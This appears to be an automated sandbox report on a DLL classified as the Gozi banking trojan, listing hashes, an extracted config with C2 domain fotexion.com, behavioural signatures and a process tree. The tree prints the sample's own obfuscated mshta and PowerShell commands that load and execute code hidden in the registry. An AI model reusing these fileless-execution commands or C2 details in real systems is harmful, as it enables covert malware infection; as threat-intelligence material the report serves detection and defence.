Analysis

  • max time kernel
    159s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 13:22

General

  • Target

    72e2a5c797954e895a41be5b20f867b2.dll

  • Size

    206KB

  • MD5

    72e2a5c797954e895a41be5b20f867b2

  • SHA1

    419aacfb3ccea9b08277bcc9405054fa4238a597

  • SHA256

    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

  • SHA512

    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

  • SSDEEP

    6144:sMmIE7vr+qWNGzfXDanCU60rPP+vJsWKq12Jy:o/7DrQGzfXDeCU6cevKWXwy

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\72e2a5c797954e895a41be5b20f867b2.dll,#1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4488
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\72e2a5c797954e895a41be5b20f867b2.dll,#1
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\system32\control.exe
          C:\Windows\system32\control.exe -h
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3408
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            5⤵
              PID:4880
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>G6ju='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(G6ju).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srtjiayn -value gp; new-alias -name kcmqlqigp -value iex; kcmqlqigp ([System.Text.Encoding]::ASCII.GetString((srtjiayn "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1368
      • C:\Windows\syswow64\cmd.exe
        "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
        2⤵
          PID:3720
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:4832
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:3968
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
              PID:3676
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
                PID:4596

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm1t0u53.a0e.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/1368-75-0x0000024C52AD0000-0x0000024C52AF2000-memory.dmp
                Filesize

                136KB

              • memory/1524-57-0x0000000000A80000-0x0000000000A8E000-memory.dmp
                Filesize

                56KB

              • memory/1524-1-0x0000000000A80000-0x0000000000A8E000-memory.dmp
                Filesize

                56KB

              • memory/1524-2-0x0000000002660000-0x000000000266D000-memory.dmp
                Filesize

                52KB

              • memory/1524-5-0x0000000000E50000-0x0000000000E79000-memory.dmp
                Filesize

                164KB

              • memory/1524-6-0x0000000000A80000-0x0000000000A8E000-memory.dmp
                Filesize

                56KB

              • memory/1524-0-0x0000000000E50000-0x0000000000E79000-memory.dmp
                Filesize

                164KB

              • memory/3096-15-0x0000000008D50000-0x0000000008DF4000-memory.dmp
                Filesize

                656KB

              • memory/3096-16-0x0000000000960000-0x0000000000961000-memory.dmp
                Filesize

                4KB

              • memory/3096-58-0x0000000008D50000-0x0000000008DF4000-memory.dmp
                Filesize

                656KB

              • memory/3408-9-0x00000000003D0000-0x0000000000474000-memory.dmp
                Filesize

                656KB

              • memory/3408-10-0x0000000000480000-0x0000000000481000-memory.dmp
                Filesize

                4KB

              • memory/3408-38-0x00000000003D0000-0x0000000000474000-memory.dmp
                Filesize

                656KB

              • memory/3676-23-0x0000027EF9D80000-0x0000027EF9E24000-memory.dmp
                Filesize

                656KB

              • memory/3676-62-0x0000027EF9D80000-0x0000027EF9E24000-memory.dmp
                Filesize

                656KB

              • memory/3676-24-0x0000027EF9A50000-0x0000027EF9A51000-memory.dmp
                Filesize

                4KB

              • memory/3720-59-0x0000000001340000-0x00000000013D8000-memory.dmp
                Filesize

                608KB

              • memory/3720-60-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
                Filesize

                4KB

              • memory/3720-64-0x0000000001340000-0x00000000013D8000-memory.dmp
                Filesize

                608KB

              • memory/3968-31-0x000002A433DC0000-0x000002A433DC1000-memory.dmp
                Filesize

                4KB

              • memory/3968-65-0x000002A433E00000-0x000002A433EA4000-memory.dmp
                Filesize

                656KB

              • memory/3968-29-0x000002A433E00000-0x000002A433EA4000-memory.dmp
                Filesize

                656KB

              • memory/4596-52-0x000002E0FE070000-0x000002E0FE071000-memory.dmp
                Filesize

                4KB

              • memory/4596-49-0x000002E0FDFC0000-0x000002E0FE064000-memory.dmp
                Filesize

                656KB

              • memory/4832-42-0x0000023608840000-0x00000236088E4000-memory.dmp
                Filesize

                656KB

              • memory/4832-45-0x0000023607FE0000-0x0000023607FE1000-memory.dmp
                Filesize

                4KB

              • memory/4880-54-0x0000027AA7700000-0x0000027AA77A4000-memory.dmp
                Filesize

                656KB

              • memory/4880-35-0x0000027AA77B0000-0x0000027AA77B1000-memory.dmp
                Filesize

                4KB

              • memory/4880-30-0x0000027AA7700000-0x0000027AA77A4000-memory.dmp
                Filesize

                656KB